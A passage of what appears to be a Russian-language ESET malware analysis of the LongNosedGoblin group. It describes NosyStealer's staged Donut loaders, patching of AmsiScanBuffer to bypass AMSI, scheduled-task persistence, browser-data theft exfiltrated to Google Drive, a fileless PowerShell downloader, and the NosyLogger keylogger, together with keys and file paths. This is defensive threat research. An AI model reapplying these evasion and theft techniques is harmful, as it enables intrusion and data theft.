<span>msi.dll<\/span>.<\/p>\n<h4>\u042d\u0442\u0430\u043f 3 NosyStealer \u2013 \u0437\u0430\u0433\u0440\u0443\u0437\u0447\u0438\u043a<a><\/a><\/h4>\n<p>\u041a\u0430\u043a \u0443\u043f\u043e\u043c\u0438\u043d\u0430\u043b\u043e\u0441\u044c \u0432 \u0440\u0430\u0437\u0434\u0435\u043b\u0435 <em><a href=\"#NosyStealer%20Stage%202%20%E2%80%93%20injector\">\u042d\u0442\u0430\u043f 2 NosyStealer \u2013 \u0438\u043d\u044a\u0435\u043a\u0442\u043e\u0440<\/a><\/em>, \u044d\u0442\u043e\u0442 \u044d\u0442\u0430\u043f \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0441\u043e\u0431\u043e\u0439 \u0448\u0435\u043b\u043b\u043a\u043e\u0434, \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0449\u0438\u0439 \u0432\u0441\u0442\u0440\u043e\u0435\u043d\u043d\u044b\u0439 PE-\u0444\u0430\u0439\u043b, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0440\u0430\u0441\u0448\u0438\u0444\u0440\u043e\u0432\u044b\u0432\u0430\u0435\u0442\u0441\u044f, \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u0442\u0441\u044f \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442\u0441\u044f \u0432 \u043f\u0430\u043c\u044f\u0442\u0438 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043e\u0442\u0440\u0430\u0436\u0430\u044e\u0449\u0435\u0433\u043e \u0437\u0430\u0433\u0440\u0443\u0437\u0447\u0438\u043a\u0430 Donut. \u0418\u0437\u0432\u043b\u0435\u0447\u0435\u043d\u043d\u044b\u0439 \u0431\u0438\u043d\u0430\u0440\u043d\u044b\u0439 \u0444\u0430\u0439\u043b \u2014 \u044d\u0442\u043e \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0435 C\/C++.<\/p>\n<p>\u041a\u0430\u043a \u0438 \u0432 <em><a href=\"#NosyDoor%20Stage%202%20%E2%80%93%20AppDomainManager%20injection\">\u042d\u0442\u0430\u043f\u0435 2 NosyDoor \u2013 \u0438\u043d\u044a\u0435\u043a\u0446\u0438\u044f AppDomainManager<\/a><\/em>, \u044d\u0442\u043e\u0442 \u044d\u0442\u0430\u043f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u0443\u044e \u0442\u0435\u0445\u043d\u0438\u043a\u0443 \u0434\u043b\u044f \u043e\u0431\u0445\u043e\u0434\u0430 AMSI. \u041e\u043d \u043f\u0430\u0442\u0447\u0438\u0442 \u0444\u0443\u043d\u043a\u0446\u0438\u044e <span>AmsiScanBuffer<\/span> \u0432 \u0437\u0430\u0433\u0440\u0443\u0436\u0435\u043d\u043d\u043e\u0439 <span>amsi.dll<\/span> \u043a\u043e\u0434\u043e\u043c, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0432\u043e\u0437\u0432\u0440\u0430\u0449\u0430\u0435\u0442 <span>E_INVALIDARG<\/span> (\u0441\u043c. \u0420\u0438\u0441\u0443\u043d\u043e\u043a 6).<\/p>\n<figure><img decoding=\"async\" alt=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 6. \u0414\u0435\u043a\u043e\u043c\u043f\u0438\u043b\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u043a\u043e\u0434 Hex-Rays, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u0430\u0442\u0447\u0438\u0442 AmsiScanBuffer\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/12-25\/longnosedgoblin\/figure-6.png\" title=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 6. \u0414\u0435\u043a\u043e\u043c\u043f\u0438\u043b\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u043a\u043e\u0434 Hex-Rays, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u0430\u0442\u0447\u0438\u0442 AmsiScanBuffer\" width=\"\"><figcaption><em>\u0420\u0438\u0441\u0443\u043d\u043e\u043a 6. \u0414\u0435\u043a\u043e\u043c\u043f\u0438\u043b\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u043a\u043e\u0434 Hex-Rays, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u0430\u0442\u0447\u0438\u0442 <\/em><span>AmsiScanBuffer<\/span><\/figcaption><\/figure>\n<p>\u0417\u0430\u0442\u0435\u043c \u043e\u043d \u0441\u043e\u0437\u0434\u0430\u0435\u0442 \u0437\u0430\u0434\u0430\u0447\u0443 Windows \u0441 \u0438\u043c\u0435\u043d\u0435\u043c Daily Check Task, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0435\u0436\u0435\u0434\u043d\u0435\u0432\u043d\u043e \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442 <span>C:ProgramDataMicrosoftWDFpmp.exe<\/span> (\u042d\u0442\u0430\u043f 1 NosyStealer) \u0441 \u043f\u0440\u0430\u0432\u0430\u043c\u0438 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u043e\u0439 \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438.<\/p>\n<p>\u041f\u043e\u0441\u043b\u0435 \u043f\u0430\u0442\u0447\u0438\u043d\u0433\u0430 \u0444\u0443\u043d\u043a\u0446\u0438\u0438 AMSI \u0438 \u0441\u043e\u0445\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u043e\u043d \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u0442 \u0440\u0430\u0431\u043e\u0442\u0443 \u0430\u043d\u0430\u043b\u043e\u0433\u0438\u0447\u043d\u043e \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0435\u043c\u0443 \u044d\u0442\u0430\u043f\u0443 \u2014 \u0440\u0430\u0441\u0448\u0438\u0444\u0440\u043e\u0432\u044b\u0432\u0430\u0435\u0442 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0439 \u044d\u0442\u0430\u043f \u0438\u0437 \u0436\u0435\u0441\u0442\u043a\u043e \u0437\u0430\u0434\u0430\u043d\u043d\u043e\u0433\u043e \u043f\u0443\u0442\u0438 <span>C:ProgramDataMicrosoftWDFmfd.dat<\/span> \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043e\u0434\u043d\u043e\u0431\u0430\u0439\u0442\u043e\u0432\u043e\u0433\u043e XOR-\u0448\u0438\u0444\u0440\u0430 \u0441 \u043a\u043b\u044e\u0447\u043e\u043c <span>0x7A<\/span>, \u0433\u0434\u0435 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0438\u0440\u0443\u044e\u0449\u0438\u0439 \u0431\u043b\u043e\u043a \u2014 \u044d\u0442\u043e \u0434\u0440\u0443\u0433\u043e\u0439 \u0448\u0435\u043b\u043b\u043a\u043e\u0434 Donut, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0437\u0430\u0442\u0435\u043c \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442\u0441\u044f.<\/p>\n<h4>\u042d\u0442\u0430\u043f 4 NosyStealer \u2013 \u043f\u043e\u043b\u0435\u0437\u043d\u0430\u044f \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0430<\/h4>\n<p>\u041e\u043f\u044f\u0442\u044c \u0436\u0435, \u043a\u0430\u043a \u0438 \u0432 <em><a href=\"#NosyStealer%20Stage%203%20%E2%80%93%20loader\">\u042d\u0442\u0430\u043f\u0435 3 NosyStealer \u2013 \u0437\u0430\u0433\u0440\u0443\u0437\u0447\u0438\u043a<\/a>,<\/em> \u044d\u0442\u043e\u0442 \u044d\u0442\u0430\u043f \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0441\u043e\u0431\u043e\u0439 \u0448\u0435\u043b\u043b\u043a\u043e\u0434, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0440\u0430\u0441\u0448\u0438\u0444\u0440\u043e\u0432\u044b\u0432\u0430\u0435\u0442, \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u0442 \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442 \u0432\u0441\u0442\u0440\u043e\u0435\u043d\u043d\u044b\u0439 PE-\u0444\u0430\u0439\u043b \u0432 \u043f\u0430\u043c\u044f\u0442\u0438 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043e\u0442\u0440\u0430\u0436\u0430\u044e\u0449\u0435\u0433\u043e \u0437\u0430\u0433\u0440\u0443\u0437\u0447\u0438\u043a\u0430 Donut. \u041d\u0430 \u044d\u0442\u043e\u0442 \u0440\u0430\u0437 \u0438\u0437\u0432\u043b\u0435\u0447\u0435\u043d\u043d\u044b\u0439 \u0431\u0438\u043d\u0430\u0440\u043d\u044b\u0439 \u0444\u0430\u0439\u043b \u2014 \u044d\u0442\u043e \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0435 Go, \u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u043a\u0440\u0430\u0434\u0435\u0442 \u0434\u0430\u043d\u043d\u044b\u0435 \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0430 \u0438\u0437 \u0432\u0435\u0431-\u0431\u0440\u0430\u0443\u0437\u0435\u0440\u043e\u0432 Microsoft Edge \u0438 Google Chrome. \u0414\u043b\u044f \u044d\u0442\u043e\u0433\u043e \u043e\u043d\u043e \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u0442 \u0444\u0430\u0439\u043b \u0441 \u0438\u043c\u0435\u043d\u0435\u043c <span>config<\/span> \u0438\u0437 Google Docs. \u041a\u043e\u0433\u0434\u0430 \u0444\u0430\u0439\u043b \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u0442 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440 \u0436\u0435\u0440\u0442\u0432\u044b, NosyStealer \u0441\u0447\u0438\u0442\u044b\u0432\u0430\u0435\u0442 \u0434\u0430\u043d\u043d\u044b\u0435 \u043f\u0440\u043e\u0444\u0438\u043b\u044f Microsoft Edge \u0438 Google Chrome, \u0430\u0440\u0445\u0438\u0432\u0438\u0440\u0443\u0435\u0442 \u0438\u0445 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e tar \u0438 \u0448\u0438\u0444\u0440\u0443\u0435\u0442 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u043e\u0433\u043e \u0448\u0438\u0444\u0440\u0430.<\/p>\n<p>\u0417\u0430\u0442\u0435\u043c NosyStealer \u0438\u0437\u0432\u043b\u0435\u043a\u0430\u0435\u0442 \u0437\u0430\u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 tar-\u0430\u0440\u0445\u0438\u0432 \u0432 Google Drive. \u0420\u0438\u0441\u0443\u043d\u043e\u043a 7 \u2014 \u043f\u0440\u0438\u043c\u0435\u0440 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 \u0432 \u0444\u043e\u0440\u043c\u0430\u0442\u0435 JSON, \u0432\u0441\u0442\u0440\u043e\u0435\u043d\u043d\u043e\u0439 \u0432 \u0431\u0438\u043d\u0430\u0440\u043d\u044b\u0439 \u0444\u0430\u0439\u043b, \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e\u0439 \u0434\u043b\u044f \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a Google Drive \u0438 Google Docs.<\/p>\n<pre><code>{ \"type\": \"service_account\", \"project_id\": \"dev0-411506\", \"private_key_id\": \"[redacted]\", \"private_key\": \"[redacted]\", \"client_email\": \"dev0-660@dev0-411506.iam.gserviceaccount.com\", \"client_id\": \"[redacted]\", \"auth_uri\": \"https:\/\/accounts.google.com\/o\/oauth2\/auth\", \"token_uri\": \"https:\/\/oauth2.googleapis.com\/token\", \"auth_provider_x509_cert_url\": \"https:\/\/www.googleapis.com\/oauth2\/v1\/certs\", \"client_x509_cert_url\": \"https:\/\/www.googleapis.com\/robot\/v1\/metadata\/x509\/dev0-660%40dev0-411506.iam.gserviceaccount.com\", \"universe_domain\": \"googleapis.com\" }<\/code><\/pre>\n<p><em>\u0420\u0438\u0441\u0443\u043d\u043e\u043a 7. \u041a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u044f NosyStealer<\/em><\/p>\n<p>NosyStealer \u0442\u0430\u043a\u0436\u0435 \u0437\u0430\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0442 \u043e\u0448\u0438\u0431\u043a\u0438 \u0438 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u044f \u043e \u0441\u0442\u0430\u0442\u0443\u0441\u0435 \u0432 \u0444\u0430\u0439\u043b Google Docs \u043f\u043e\u0434 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435\u043c <span>log<\/span>, \u043a\u0443\u0434\u0430 \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u043f\u0430\u0434\u0430\u0442\u044c \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u043e\u0442 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u0438\u0445 \u0436\u0435\u0440\u0442\u0432. \u0421\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u0435 \u043e \u0441\u0442\u0430\u0442\u0443\u0441\u0435 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u0442 \u043a\u043e\u043d\u0441\u0442\u0430\u043d\u0442\u0443 <span>9<\/span>, \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e, \u044d\u0442\u043e \u0432\u0435\u0440\u0441\u0438\u044f NosyStealer. \u041f\u043e\u043b\u043d\u044b\u0439 \u0444\u043e\u0440\u043c\u0430\u0442 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u044f \u043e \u0441\u0442\u0430\u0442\u0443\u0441\u0435, \u0433\u0434\u0435 <span>&lt;machine_local_ips&gt;<\/span> \u2014 \u044d\u0442\u043e \u0441\u043f\u0438\u0441\u043e\u043a \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u044b\u0445 IPv4-\u0430\u0434\u0440\u0435\u0441\u043e\u0432 \u0441\u0435\u0442\u0435\u0432\u044b\u0445 \u0430\u0434\u0430\u043f\u0442\u0435\u0440\u043e\u0432, \u0432\u044b\u0433\u043b\u044f\u0434\u0438\u0442 \u0442\u0430\u043a:<\/p>\n<p><span>&lt;local_date&gt; &#8212; &lt;victim_id&gt; &#8212; 9 &#8212; heartbeat &lt;machine_local_ips&gt;<\/span><\/p>\n<h3>NosyDownloader<\/h3>\n<p>\u0410\u043d\u0430\u043b\u0438\u0437\u0438\u0440\u0443\u044f \u0442\u0435\u043b\u0435\u043c\u0435\u0442\u0440\u0438\u0447\u0435\u0441\u043a\u0438\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 ESET, \u043c\u044b \u0442\u0430\u043a\u0436\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u0432 \u0441\u0435\u0442\u044f\u0445, \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 LongNosedGoblin, \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0435 \u0438\u0437\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e \u0431\u0435\u0437\u0432\u0440\u0435\u0434\u043d\u044b\u0435 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f, \u0432 \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0431\u044b\u043b \u0432\u043d\u0435\u0434\u0440\u0435\u043d \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u043a\u043e\u0434. \u042d\u0442\u043e\u0442 \u043a\u043e\u0434 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u0442 \u0437\u0430\u0433\u0440\u0443\u0437\u0447\u0438\u043a, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043c\u044b \u043d\u0430\u0437\u0432\u0430\u043b\u0438 NosyDownloader. \u041e\u043d \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442 \u0446\u0435\u043f\u043e\u0447\u043a\u0443 \u043e\u0431\u0444\u0443\u0441\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u043a\u043e\u043c\u0430\u043d\u0434, \u043f\u0435\u0440\u0435\u0434\u0430\u0432\u0430\u0435\u043c\u044b\u0445 \u0432 \u0437\u0430\u043f\u0443\u0449\u0435\u043d\u043d\u044b\u0439 \u043f\u0440\u043e\u0446\u0435\u0441\u0441 PowerShell \u043a\u0430\u043a \u043e\u0434\u0438\u043d \u0434\u043b\u0438\u043d\u043d\u044b\u0439 \u0430\u0440\u0433\u0443\u043c\u0435\u043d\u0442 \u043a\u043e\u043c\u0430\u043d\u0434\u043d\u043e\u0439 \u0441\u0442\u0440\u043e\u043a\u0438, \u0447\u0442\u043e \u043e\u0437\u043d\u0430\u0447\u0430\u0435\u0442, \u0447\u0442\u043e \u0441\u043a\u0440\u0438\u043f\u0442 \u043d\u0435 \u0445\u0440\u0430\u043d\u0438\u0442\u0441\u044f \u043d\u0430 \u0434\u0438\u0441\u043a\u0435. \u041a\u0430\u0436\u0434\u044b\u0439 \u043f\u043e\u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0439 \u044d\u0442\u0430\u043f \u0437\u0430\u043a\u043e\u0434\u0438\u0440\u043e\u0432\u0430\u043d \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e base64, \u0430 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0439 \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0441\u0436\u0430\u0442 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e gzip.<\/p>\n<p>\u041a\u0430\u0436\u0434\u044b\u0439 \u044d\u0442\u0430\u043f \u043a\u0440\u0430\u0442\u043a\u043e \u043e\u043f\u0438\u0441\u0430\u043d \u0432 \u0422\u0430\u0431\u043b\u0438\u0446\u0435 3. \u041a\u0430\u043a \u0438 NosyDoor Stage 2 \u0438 NosyStealer Stage 3, \u0432\u0442\u043e\u0440\u043e\u0439 \u044d\u0442\u0430\u043f \u0437\u0434\u0435\u0441\u044c \u0442\u0430\u043a\u0436\u0435 \u043e\u0431\u0445\u043e\u0434\u0438\u0442 AMSI. \u0412 \u0434\u0430\u043d\u043d\u043e\u043c \u0441\u043b\u0443\u0447\u0430\u0435 NosyDownloader \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u043c\u0435\u0442\u043e\u0434 \u0440\u0435\u0444\u043b\u0435\u043a\u0441\u0438\u0438 \u041c\u044d\u0442\u0442\u0430 \u0413\u0440\u0435\u0431\u0435\u0440\u0430 \u0438 \u043c\u0435\u0442\u043e\u0434\u044b \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044f \u043b\u043e\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0441\u043a\u0440\u0438\u043f\u0442\u043e\u0432, \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0435 \u043d\u0430 GitHub, \u0434\u043b\u044f \u043e\u0431\u0445\u043e\u0434\u0430 AMSI.<\/p>\n<p><em>\u0422\u0430\u0431\u043b\u0438\u0446\u0430 3. \u042d\u0442\u0430\u043f\u044b \u0441\u043a\u0440\u0438\u043f\u0442\u0430 NosyDownloader<\/em><\/p>\n<\/p>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" width=\"642\">\n<thead>\n<tr>\n<td width=\"66\"><strong>\u042d\u0442\u0430\u043f<\/strong><\/td>\n<td width=\"577\"><strong>\u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"66\">1<\/td>\n<td width=\"577\">\u0414\u0435\u043a\u043e\u0434\u0438\u0440\u0443\u0435\u0442 \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442 \u042d\u0442\u0430\u043f 2 \u0432 \u043d\u043e\u0432\u043e\u043c \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0435 PowerShell, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442\u0441\u044f \u0432 \u0441\u043a\u0440\u044b\u0442\u043e\u043c \u043e\u043a\u043d\u0435.<\/td>\n<\/tr>\n<tr>\n<td width=\"66\">2<\/td>\n<td width=\"577\">\u041e\u0431\u0445\u043e\u0434\u0438\u0442 AMSI, \u0437\u0430\u0442\u0435\u043c \u0434\u0435\u043a\u043e\u0434\u0438\u0440\u0443\u0435\u0442 \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442 \u042d\u0442\u0430\u043f 3.<\/td>\n<\/tr>\n<tr>\n<td width=\"66\">3<\/td>\n<td width=\"577\">\u0414\u0435\u043a\u043e\u0434\u0438\u0440\u0443\u0435\u0442, \u0440\u0430\u0441\u043f\u0430\u043a\u043e\u0432\u044b\u0432\u0430\u0435\u0442 \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442 \u042d\u0442\u0430\u043f 4.<\/td>\n<\/tr>\n<tr>\n<td width=\"66\">4<\/td>\n<td width=\"577\">\u0417\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u0442 \u043f\u043e\u043b\u0435\u0437\u043d\u0443\u044e \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0443 \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442 \u0435\u0435 \u0432 \u043f\u0430\u043c\u044f\u0442\u0438 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e <a href=\"https:\/\/learn.microsoft.com\/en-us\/powershell\/module\/microsoft.powershell.utility\/invoke-expression?view=powershell-7.4\">Invoke-Expression<\/a>.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>\u041c\u044b \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u0430\u0433\u0430\u0435\u043c, \u0447\u0442\u043e NosyDownloader \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0441\u044f \u0434\u043b\u044f \u0440\u0430\u0437\u0432\u0435\u0440\u0442\u044b\u0432\u0430\u043d\u0438\u044f ReverseSocks5, NosyLogger \u0438 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0430 \u0430\u0440\u0433\u0443\u043c\u0435\u043d\u0442\u043e\u0432, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u043c\u044b \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u043b\u0438 \u0438\u0445 \u0432 \u0442\u0435\u0447\u0435\u043d\u0438\u0435 \u043d\u0435\u0434\u0435\u043b\u0438 \u043f\u043e\u0441\u043b\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f NosyDownloader.<\/p>\n<h3>NosyLogger<\/h3>\n<p>\u041c\u044b \u0442\u0430\u043a\u0436\u0435 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043b\u0438 C#\/.NET keylogger, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043c\u044b \u043d\u0430\u0437\u0432\u0430\u043b\u0438 NosyLogger. \u041f\u043e\u0445\u043e\u0436\u0435, \u044d\u0442\u043e \u043c\u043e\u0434\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u0430\u044f \u0432\u0435\u0440\u0441\u0438\u044f open-source keylogger <a href=\"https:\/\/github.com\/zorggomat\/DuckSharp\">DuckSharp<\/a>, \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u0435 \u043e\u0442\u043b\u0438\u0447\u0438\u044f \u0437\u0430\u043a\u043b\u044e\u0447\u0430\u044e\u0442\u0441\u044f \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e \u043e\u043d \u043d\u0435 \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u0442 \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u044b\u0435 \u043f\u0438\u0441\u044c\u043c\u0430 \u0438 \u043d\u0435 \u043f\u0435\u0440\u0435\u0432\u043e\u0434\u0438\u0442 \u043d\u0430\u0436\u0430\u0442\u044b\u0435 \u043a\u043b\u0430\u0432\u0438\u0448\u0438 \u043d\u0430 \u043a\u0438\u0440\u0438\u043b\u043b\u0438\u0446\u0443.<\/p>\n<p>\u0412\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0435 \u041f\u041e \u0441\u043d\u0430\u0447\u0430\u043b\u0430 \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0435\u0442 \u043d\u0430\u043b\u0438\u0447\u0438\u0435 \u043e\u0442\u043b\u0430\u0434\u0447\u0438\u043a\u0430 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e API <span>IsDebuggerPresent<\/span> \u0438 <span>CheckRemoteDebuggerPresent<\/span>; \u0435\u0441\u043b\u0438 \u043e\u0442\u043b\u0430\u0434\u0447\u0438\u043a \u043d\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d, \u043e\u043d\u043e \u043d\u0430\u0447\u0438\u043d\u0430\u0435\u0442 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u0444\u0443\u043d\u043a\u0446\u0438\u044e \u043a\u0435\u0439\u043b\u043e\u0433\u0433\u0435\u0440\u0430.<\/p>\n<p>\u0418\u043c\u044f \u043e\u043a\u043d\u0430, \u043d\u0430\u0436\u0430\u0442\u044b\u0435 \u043a\u043b\u0430\u0432\u0438\u0448\u0438 \u0438 \u0441\u043a\u043e\u043f\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0435 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u0431\u0443\u0444\u0435\u0440\u0430 \u043e\u0431\u043c\u0435\u043d\u0430 \u043d\u0430\u043a\u0430\u043f\u043b\u0438\u0432\u0430\u044e\u0442\u0441\u044f \u0432 \u043f\u0430\u043c\u044f\u0442\u0438. NosyLogger \u0448\u0438\u0444\u0440\u0443\u0435\u0442 \u044d\u0442\u0438 \u043f\u0430\u043a\u0435\u0442\u044b \u0434\u0430\u043d\u043d\u044b\u0445 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e AES \u0441 \u043a\u043b\u044e\u0447\u043e\u043c <span>D53FCC01038E20193FBD51B7400075CF7C9C4402B73DA7B0DB836B000EBD8B1C<\/span> \u0438 <a href=\"https:\/\/learn.microsoft.com\/en-us\/dotnet\/api\/system.security.cryptography.symmetricalgorithm.generateiv\">\u0441\u043b\u0443\u0447\u0430\u0439\u043d\u043e \u0441\u0433\u0435\u043d\u0435\u0440\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e<\/a> \u0432\u0435\u043a\u0442\u043e\u0440\u0430 \u0438\u043d\u0438\u0446\u0438\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 \u0444\u0438\u043a\u0441\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0439 \u0434\u043b\u0438\u043d\u044b. \u0412\u0435\u043a\u0442\u043e\u0440 \u0434\u043e\u0431\u0430\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043a \u0437\u0430\u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u043c\u0443 \u043f\u0430\u043a\u0435\u0442\u0443 \u0434\u0430\u043d\u043d\u044b\u0445. \u0417\u0430\u0442\u0435\u043c \u0437\u0430\u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u043f\u0430\u043a\u0435\u0442 \u0434\u0430\u043d\u043d\u044b\u0445 \u0434\u043e\u0431\u0430\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0432 \u0444\u0430\u0439\u043b \u043f\u043e \u0436\u0435\u0441\u0442\u043a\u043e \u0437\u0430\u0434\u0430\u043d\u043d\u043e\u043c\u0443 \u043f\u0443\u0442\u0438 <span>C:WindowsTempTS_D418.tmp<\/span> \u0432 \u0432\u0438\u0434\u0435 \u0448\u0435\u0441\u0442\u043d\u0430\u0434\u0446\u0430\u0442\u0435\u0440\u0438\u0447\u043d\u043e\u0439 \u0441\u0442\u0440\u043e\u043a\u0438. \u0412 \u044d\u0442\u043e\u043c \u0444\u0430\u0439\u043b\u0435 \u043a\u0430\u0436\u0434\u044b\u0439 \u0437\u0430\u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u043f\u0430\u043a\u0435\u0442 